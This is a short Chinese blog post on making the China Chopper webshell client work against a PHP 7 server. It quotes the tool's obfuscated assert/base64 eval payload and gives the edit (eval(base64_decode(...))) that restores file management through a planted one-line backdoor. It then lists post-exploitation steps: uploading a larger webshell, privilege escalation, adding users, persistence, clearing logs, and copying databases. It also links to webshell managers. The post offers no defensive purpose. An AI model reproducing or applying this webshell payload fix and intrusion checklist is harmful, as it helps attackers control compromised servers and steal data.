菜刀连接一句话木马出现:`Cannot call assert() with string argument dynamically`错误
2024-08-30 01:15:34
前言
逆天还是上学那会玩渗透的,后来工作后就再也没碰了,所以用的工具还是以前经典款,这不,发现出问题了
问题
如果是PHP5则没有问题,如果是PHP7,会出现:Cannot call assert() with string argument dynamically的提示
解决
用谷歌搜了下,发现了这篇解释:https://www.freebuf.com/articles/web/197013.html
知道了本质就简单了,菜刀这个软件之所以经典就是因为它的灵活性很强,修改下配置文件即可
PS:把
array_map("ass"."ert",array("ev"."Al(\"\\\$xx%%3D\\\"Ba"."SE6"."4_dEc"."OdE\\\";@ev"."al(\\\$xx('%s'));\");"));改成eval(base64_decode('%s'));即可
这时候文件管理的功能就能使用了,下面就是常规操作了(文件上传下载、大马、提权、建用户、远程连接、权限维持、清日记...)
PS:copy数据库、网站,本地搭建一个和服务器一样的环境,进一步探索与发现~~~
附录
菜刀下载:https://github.com/raddyfiy/caidao-official-version
取代菜刀:蚁剑:https://github.com/AntSwordProject/AntSword-Loader or Cknife:https://github.com/Chora10/Cknife
最新文章
- [LeetCode] Multiply Strings 字符串相乘
- javaWeb开发中的中文编码问题
- 在Linux上配置xampp后远程访问域名报错
- C++ 中 typename
- 获取iframe加载完毕事件
- Region Representaion and Description
- Android activity_main.xml删除边缘距离,充满屏幕
- DataTable .Load 方法 (IDataReader)
- 222. Count Complete Tree Nodes
- Cent os关机与重启命令详解
- 第一个js面向对象的小实验
- JAVA--好友界面面板
- poI地址纠偏查询存储过程理解
- Android Studio 下载地址【包括国内本地下载】
- 纯css三角形
- Oracle联机日志损坏解决办法
- c++头文件重复引用问题
- resource links
- HDU 1074 Doing Homework(经典状压dp)
- jqueryui组件progressbar进度条和日期组件datepickers的简单使用